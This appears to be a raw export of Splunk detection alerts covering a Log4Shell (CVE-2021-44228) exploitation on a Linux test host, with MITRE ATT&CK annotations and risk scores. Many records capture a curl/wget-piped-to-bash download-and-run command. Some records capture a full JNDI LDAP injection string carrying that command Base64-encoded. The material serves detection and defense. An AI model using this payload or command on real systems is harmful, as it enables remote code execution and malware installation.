Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", 
http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643054, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="Stage:Initial Access", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643054, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="Stage:Initial Access", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", 
annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", 
risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 